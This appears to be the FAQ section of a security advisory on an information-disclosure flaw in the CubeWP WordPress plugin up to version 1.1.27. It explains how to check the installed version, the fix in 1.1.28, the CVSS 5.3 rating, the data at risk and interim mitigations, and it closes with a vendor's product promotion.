To check if your site is vulnerable, log in to your WordPress admin panel, navigate to the Plugins section, and look for the CubeWP plugin. If the version is 1.1.27 or earlier, your site is vulnerable.
How can I fix or mitigate the issue?
Applying the patch
To mitigate this vulnerability, update the CubeWP plugin to version 1.1.28 or later, where the issue has been patched. Regularly updating all plugins is a best practice to avoid vulnerabilities.
What does the CVSS score of 5.3 mean?
Understanding risk levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This suggests that while the vulnerability is not critical, it poses a significant risk of information exposure that could lead to further attacks or data breaches.
What type of data can be exposed?
Potential information leakage
The vulnerability can lead to unauthorized disclosure of sensitive content, including full post content, titles, metadata, and custom field data from posts that are meant to be restricted.
How does the proof of concept demonstrate the issue?
Illustrating exploitation
The proof of concept provided shows how an attacker can craft a request to the vulnerable endpoint, specifying parameters that instruct the system to return posts regardless of their visibility status. This illustrates how easily an attacker can exploit the vulnerability.
What are the consequences of exploitation?
Impacts of data exposure
If exploited, this vulnerability can lead to serious privacy violations and information leakage, allowing attackers to gather sensitive business intelligence or personal data from restricted posts.
Is there a way to prevent similar vulnerabilities in the future?
Best practices for security
To prevent similar vulnerabilities, ensure that all plugins are regularly updated, implement strict access controls, and conduct regular security audits of your WordPress site and its components.
What should I do if I cannot update the plugin immediately?
Interim measures
If you cannot update the plugin immediately, consider disabling the CubeWP plugin temporarily to prevent unauthorized access until you can apply the update.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations